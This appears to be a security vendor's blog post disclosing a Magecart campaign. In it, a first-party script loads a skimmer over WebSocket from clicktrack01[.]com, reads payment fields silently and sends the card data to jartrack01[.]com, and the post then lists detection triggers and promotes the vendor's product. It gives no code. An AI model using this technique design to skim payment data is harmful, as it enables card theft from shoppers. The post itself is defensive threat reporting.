New Magecart Attack: Silent Skimming and WebSockets

NEW MAGECART ATTACK: SILENT SKIMMING AND WEBSOCKETS 

July 8, 2025

A newly discovered Magecart campaign is raising the bar on stealth—executing a silent skimming attack that evades conventional detection mechanisms by abusing first-party code and WebSocket channels.

Attack details

A trusted first-party script establishes a WebSocket connection to clicktrack01[.]com, which delivers the Magecart JavaScript payload. As users enter payment details into legitimate site forms, the script silently harvests the data and exfiltrates it through a second WebSocket—this time to jartrack01[.]com.

Unlike more visible tactics that inject fake forms, this attack does not alter the user interface in any way. Users remain completely unaware, as their data is skimmed directly from real input fields and transmitted covertly.

Critical Observations 

  • First-party origin: The attack is launched from code embedded directly on the victim site—not a third-party integration—making it much harder to detect or block using CSP or third-party controls.
  • WebSocket exfiltration: Both delivery and data theft occur over WebSockets, which are rarely monitored by most security tools.
  • Previously unknown infrastructure: At the time of discovery, both clicktrack01[.]com and jartrack01[.]com had no history of malicious activity. Their inclusion in threat intelligence databases stems solely from this disclosure

Magecart Patterns

This technique aligns with a broader trend in Magecart attacks:
Silent skimming, where malicious code monitors real forms rather than spoofing them, is increasingly common.

Trusted sources and first-party scripts are being compromised more often—making detection harder and breaches more damaging.

WebSockets are becoming the channel of choice for exfiltration, due to their stealth and flexibility

How does Source Defense address such an attack?

Source Defense identified and analyzed this attack before any threat intelligence vendor had blacklisted the domains involved.

Due to their ongoing research and vigilance, these domains were promptly blacklisted in the product, and would alert the following triggers upon such an attack: 

  • Outbound data is sent to blacklisted malicious domains.
  • In the same session, PCI data is being accessed.

Conclusions

This attack reinforces the need to monitor all script behavior, not just third-party integrations, and to track unusual data flows, especially over channels like WebSockets.

Organizations relying solely on CSP or external blacklists are at risk of silent data theft—even on PCI-compliant sites.

Related Posts:

The “perfect” Magecart attack: fake stripe form with zero external footprint
Attackers strike unprotected sites – because cleanup alone is not enough
Attackers mask varying malicious scripts behind rotating trusted domains

PCI DSS 4.0 makes client-side security a priority.

Source Defense delivers a solution for 6.4.3 and 11.6.1 without adding a burden to your security teams.

Download the Guide
Scroll
Source Defense
Powered by  GDPR Cookie Compliance
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.